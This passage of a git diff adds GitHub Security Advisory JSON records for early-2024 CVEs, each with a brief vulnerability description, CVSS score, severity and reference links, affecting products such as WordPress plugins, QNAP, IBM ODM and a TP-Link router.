+++ b/advisories/unreviewed/2024/02/GHSA-5j36-2f99-3384/GHSA-5j36-2f99-3384.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5j36-2f99-3384",
+ "modified": "2024-02-02T09:30:22Z",
+ "published": "2024-02-02T09:30:22Z",
+ "aliases": [
+ "CVE-2023-48645"
+ ],
+ "details": "An issue was discovered in the Archibus app 4.0.3 for iOS. It uses a local database that is synchronized with a Web central server instance every time the application is opened, or when the refresh button is used. There is a SQL injection in the search work request feature in the Maintenance module of the app. This allows performing queries on the local database.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-48645"
+ },
+ {
+ "type": "WEB",
+ "url": "https://excellium-services.com/cert-xlm-advisory/CVE-2023-48645"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T09:15:37Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-5jxw-j59v-xhxg/GHSA-5jxw-j59v-xhxg.json b/advisories/unreviewed/2024/02/GHSA-5jxw-j59v-xhxg/GHSA-5jxw-j59v-xhxg.json
new file mode 100644
index 0000000000000..ccd7839ead607
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-5jxw-j59v-xhxg/GHSA-5jxw-j59v-xhxg.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5jxw-j59v-xhxg",
+ "modified": "2024-02-02T03:30:32Z",
+ "published": "2024-02-02T03:30:32Z",
+ "aliases": [
+ "CVE-2024-21399"
+ ],
+ "details": "Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21399"
+ },
+ {
+ "type": "WEB",
+ "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21399"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T01:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-5mg2-7ppf-36vc/GHSA-5mg2-7ppf-36vc.json b/advisories/unreviewed/2024/02/GHSA-5mg2-7ppf-36vc/GHSA-5mg2-7ppf-36vc.json
new file mode 100644
index 0000000000000..aee9d0aeb06d8
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-5mg2-7ppf-36vc/GHSA-5mg2-7ppf-36vc.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5mg2-7ppf-36vc",
+ "modified": "2024-02-08T03:32:45Z",
+ "published": "2024-02-08T03:32:45Z",
+ "aliases": [
+ "CVE-2024-24017"
+ ],
+ "details": "A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass crafted offset, limit, and sort parameters to perform SQL injection via /common/dict/list",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24017"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/201206030/novel-plus"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24017.txt"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T02:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-5mh8-m4xv-8wfr/GHSA-5mh8-m4xv-8wfr.json b/advisories/unreviewed/2024/02/GHSA-5mh8-m4xv-8wfr/GHSA-5mh8-m4xv-8wfr.json
new file mode 100644
index 0000000000000..fd58d7774247f
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-5mh8-m4xv-8wfr/GHSA-5mh8-m4xv-8wfr.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5mh8-m4xv-8wfr",
+ "modified": "2024-02-05T06:30:31Z",
+ "published": "2024-02-05T06:30:31Z",
+ "aliases": [
+ "CVE-2024-20011"
+ ],
+ "details": "In alac decoder, there is a possible information disclosure due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08441146; Issue ID: ALPS08441146.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20011"
+ },
+ {
+ "type": "WEB",
+ "url": "https://corp.mediatek.com/product-security-bulletin/February-2024"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T06:15:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-5p29-m8h2-83cg/GHSA-5p29-m8h2-83cg.json b/advisories/unreviewed/2024/02/GHSA-5p29-m8h2-83cg/GHSA-5p29-m8h2-83cg.json
new file mode 100644
index 0000000000000..388c5d67cad42
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-5p29-m8h2-83cg/GHSA-5p29-m8h2-83cg.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5p29-m8h2-83cg",
+ "modified": "2024-02-08T21:30:38Z",
+ "published": "2024-02-08T21:30:38Z",
+ "aliases": [
+ "CVE-2024-24495"
+ ],
+ "details": "SQL Injection vulnerability in delete-tracker.php in Daily Habit Tracker v.1.0 allows a remote attacker to execute arbitrary code via crafted GET request.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24495"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/DailyHabitTracker-SQL_Injection.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T21:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-5ppc-gr6c-jgcj/GHSA-5ppc-gr6c-jgcj.json b/advisories/unreviewed/2024/02/GHSA-5ppc-gr6c-jgcj/GHSA-5ppc-gr6c-jgcj.json
new file mode 100644
index 0000000000000..53d86b34db97b
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-5ppc-gr6c-jgcj/GHSA-5ppc-gr6c-jgcj.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5ppc-gr6c-jgcj",
+ "modified": "2024-02-07T18:30:27Z",
+ "published": "2024-02-02T03:30:32Z",
+ "aliases": [
+ "CVE-2024-22900"
+ ],
+ "details": "Vinchin Backup & Recovery v7.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the setNetworkCardInfo function.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22900"
+ },
+ {
+ "type": "WEB",
+ "url": "https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://seclists.org/fulldisclosure/2024/Jan/29"
+ },
+ {
+ "type": "WEB",
+ "url": "http://vinchin.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-77"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T02:15:18Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-5pq5-cp3w-7chj/GHSA-5pq5-cp3w-7chj.json b/advisories/unreviewed/2024/02/GHSA-5pq5-cp3w-7chj/GHSA-5pq5-cp3w-7chj.json
new file mode 100644
index 0000000000000..dae478202bf0b
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-5pq5-cp3w-7chj/GHSA-5pq5-cp3w-7chj.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5pq5-cp3w-7chj",
+ "modified": "2024-02-02T03:30:32Z",
+ "published": "2024-02-02T03:30:32Z",
+ "aliases": [
+ "CVE-2024-22320"
+ ],
+ "details": "IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22320"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/279146"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7112382"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T03:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-5q8j-7rff-2fw6/GHSA-5q8j-7rff-2fw6.json b/advisories/unreviewed/2024/02/GHSA-5q8j-7rff-2fw6/GHSA-5q8j-7rff-2fw6.json
new file mode 100644
index 0000000000000..faecc16f8b954
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-5q8j-7rff-2fw6/GHSA-5q8j-7rff-2fw6.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5q8j-7rff-2fw6",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0428"
+ ],
+ "details": "The Index Now plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.3. This is due to missing or incorrect nonce validation on the 'reset_form' function. This makes it possible for unauthenticated attackers to delete arbitrary site options via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0428"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3020958/mihdan-index-now/tags/2.6.4/src/Views/WPOSA.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c7641d52-e930-4143-9180-2903d018da91?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-5qw4-2v86-45mw/GHSA-5qw4-2v86-45mw.json b/advisories/unreviewed/2024/02/GHSA-5qw4-2v86-45mw/GHSA-5qw4-2v86-45mw.json
new file mode 100644
index 0000000000000..934b2ccc3efd4
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-5qw4-2v86-45mw/GHSA-5qw4-2v86-45mw.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5qw4-2v86-45mw",
+ "modified": "2024-02-06T00:30:26Z",
+ "published": "2024-02-06T00:30:26Z",
+ "aliases": [
+ "CVE-2023-6959"
+ ],
+ "details": "The Getwid – Gutenberg Blocks plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the recaptcha_api_key_manage function in all versions up to, and including, 2.0.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to add, modify, or delete the 'Recaptcha Site Key' and 'Recaptcha Secret Key' settings.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6959"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3022982"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/774c00fb-82cd-44ca-bf96-3f6dfd1977d0?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:15:57Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-5rfj-4v26-hqmw/GHSA-5rfj-4v26-hqmw.json b/advisories/unreviewed/2024/02/GHSA-5rfj-4v26-hqmw/GHSA-5rfj-4v26-hqmw.json
new file mode 100644
index 0000000000000..77306390b8796
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-5rfj-4v26-hqmw/GHSA-5rfj-4v26-hqmw.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5rfj-4v26-hqmw",
+ "modified": "2024-02-05T15:30:23Z",
+ "published": "2024-02-05T15:30:23Z",
+ "aliases": [
+ "CVE-2024-1225"
+ ],
+ "details": "A vulnerability classified as critical was found in QiboSoft QiboCMS X1 up to 1.0.6. Affected by this vulnerability is the function rmb_pay of the file /application/index/controller/Pay.php. The manipulation of the argument callback_class leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252847. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1225"
+ },
+ {
+ "type": "WEB",
+ "url": "https://note.zhaoj.in/share/jDWk6INLzO12"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252847"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252847"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T13:15:58Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-5rhg-f75j-57f8/GHSA-5rhg-f75j-57f8.json b/advisories/unreviewed/2024/02/GHSA-5rhg-f75j-57f8/GHSA-5rhg-f75j-57f8.json
new file mode 100644
index 0000000000000..7a222ec61d3a5
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-5rhg-f75j-57f8/GHSA-5rhg-f75j-57f8.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5rhg-f75j-57f8",
+ "modified": "2024-02-07T00:30:25Z",
+ "published": "2024-02-01T06:31:05Z",
+ "aliases": [
+ "CVE-2024-23941"
+ ],
+ "details": "Cross-site scripting vulnerability exists in Group Office prior to v6.6.182, prior to v6.7.64 and prior to v6.8.31, which may allow a remote authenticated attacker to execute an arbitrary script on the web browser of the user who is logging in to the product.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23941"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Intermesh/groupoffice/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jvn.jp/en/jp/JVN63567545/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.group-office.com/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T04:15:49Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-5v8x-xh64-m4xp/GHSA-5v8x-xh64-m4xp.json b/advisories/unreviewed/2024/02/GHSA-5v8x-xh64-m4xp/GHSA-5v8x-xh64-m4xp.json
new file mode 100644
index 0000000000000..14811b067a8a8
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-5v8x-xh64-m4xp/GHSA-5v8x-xh64-m4xp.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5v8x-xh64-m4xp",
+ "modified": "2024-02-05T09:30:28Z",
+ "published": "2024-02-05T09:30:28Z",
+ "aliases": [
+ "CVE-2024-24855"
+ ],
+ "details": "A race condition was found in the Linux kernel's scsi device driver in lpfc_unregister_fcf_rescan() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue.\n\n\n\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24855"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8149"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-362"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T08:15:44Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-62qv-qwj7-9q6x/GHSA-62qv-qwj7-9q6x.json b/advisories/unreviewed/2024/02/GHSA-62qv-qwj7-9q6x/GHSA-62qv-qwj7-9q6x.json
new file mode 100644
index 0000000000000..99ad87e94c865
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-62qv-qwj7-9q6x/GHSA-62qv-qwj7-9q6x.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-62qv-qwj7-9q6x",
+ "modified": "2024-02-06T18:30:21Z",
+ "published": "2024-02-06T18:30:21Z",
+ "aliases": [
+ "CVE-2023-46683"
+ ],
+ "details": "A post authentication command injection vulnerability exists when configuring the wireguard VPN functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command injection . An attacker can make an authenticated HTTP request to trigger this vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46683"
+ },
+ {
+ "type": "WEB",
+ "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1857"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T17:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-63cq-gvxf-cpjp/GHSA-63cq-gvxf-cpjp.json b/advisories/unreviewed/2024/02/GHSA-63cq-gvxf-cpjp/GHSA-63cq-gvxf-cpjp.json
new file mode 100644
index 0000000000000..16eacf2804c78
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-63cq-gvxf-cpjp/GHSA-63cq-gvxf-cpjp.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-63cq-gvxf-cpjp",
+ "modified": "2024-02-02T18:30:32Z",
+ "published": "2024-02-02T18:30:32Z",
+ "aliases": [
+ "CVE-2024-1187"
+ ],
+ "details": "A vulnerability, which was classified as problematic, has been found in Munsoft Easy Outlook Express Recovery 2.0. This issue affects some unknown processing of the component Registration Key Handler. The manipulation leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-252677 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1187"
+ },
+ {
+ "type": "WEB",
+ "url": "https://fitoxs.com/vuldb/13-exploit-perl.txt"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252677"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252677"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-404"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T18:15:32Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-65v7-6rgc-6f27/GHSA-65v7-6rgc-6f27.json b/advisories/unreviewed/2024/02/GHSA-65v7-6rgc-6f27/GHSA-65v7-6rgc-6f27.json
new file mode 100644
index 0000000000000..4b33058f9b6a4
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-65v7-6rgc-6f27/GHSA-65v7-6rgc-6f27.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-65v7-6rgc-6f27",
+ "modified": "2024-02-01T12:30:21Z",
+ "published": "2024-02-01T12:30:21Z",
+ "aliases": [
+ "CVE-2023-52189"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jhayghost Ideal Interactive Map allows Stored XSS.This issue affects Ideal Interactive Map: from n/a through 1.2.4.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52189"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/ideal-interactive-map/wordpress-ideal-interactive-map-plugin-1-2-4-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T10:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-66qc-rgfw-8hq2/GHSA-66qc-rgfw-8hq2.json b/advisories/unreviewed/2024/02/GHSA-66qc-rgfw-8hq2/GHSA-66qc-rgfw-8hq2.json
new file mode 100644
index 0000000000000..41d0a065e1fe6
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-66qc-rgfw-8hq2/GHSA-66qc-rgfw-8hq2.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-66qc-rgfw-8hq2",
+ "modified": "2024-02-06T03:32:59Z",
+ "published": "2024-02-01T12:30:23Z",
+ "aliases": [
+ "CVE-2023-51691"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in gVectors Team Comments – wpDiscuz allows Stored XSS.This issue affects Comments – wpDiscuz: from n/a through 7.6.12.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51691"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/wpdiscuz/wordpress-wpdiscuz-plugin-7-6-12-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T11:15:12Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-67ph-hcx9-mvwp/GHSA-67ph-hcx9-mvwp.json b/advisories/unreviewed/2024/02/GHSA-67ph-hcx9-mvwp/GHSA-67ph-hcx9-mvwp.json
new file mode 100644
index 0000000000000..2c48cbc142e0d
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-67ph-hcx9-mvwp/GHSA-67ph-hcx9-mvwp.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-67ph-hcx9-mvwp",
+ "modified": "2024-02-05T09:30:28Z",
+ "published": "2024-02-05T09:30:28Z",
+ "aliases": [
+ "CVE-2024-24841"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dan's Art Add Customer for WooCommerce allows Stored XSS.This issue affects Add Customer for WooCommerce: from n/a through 1.7.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24841"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/add-customer-for-woocommerce/wordpress-add-customer-for-woocommerce-plugin-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T07:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-682p-65cm-q45c/GHSA-682p-65cm-q45c.json b/advisories/unreviewed/2024/02/GHSA-682p-65cm-q45c/GHSA-682p-65cm-q45c.json
new file mode 100644
index 0000000000000..687bd4ff88a1c
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-682p-65cm-q45c/GHSA-682p-65cm-q45c.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-682p-65cm-q45c",
+ "modified": "2024-02-02T18:30:31Z",
+ "published": "2024-02-02T18:30:31Z",
+ "aliases": [
+ "CVE-2023-41278"
+ ],
+ "details": "A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.2.2533 build 20230926 and later\nQuTS hero h5.1.2.2534 build 20230927 and later\nQuTScloud c5.1.5.2651 and later\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41278"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qnap.com/en/security-advisory/qsa-23-38"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-120"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:48Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-68pq-vjfc-wpgv/GHSA-68pq-vjfc-wpgv.json b/advisories/unreviewed/2024/02/GHSA-68pq-vjfc-wpgv/GHSA-68pq-vjfc-wpgv.json
new file mode 100644
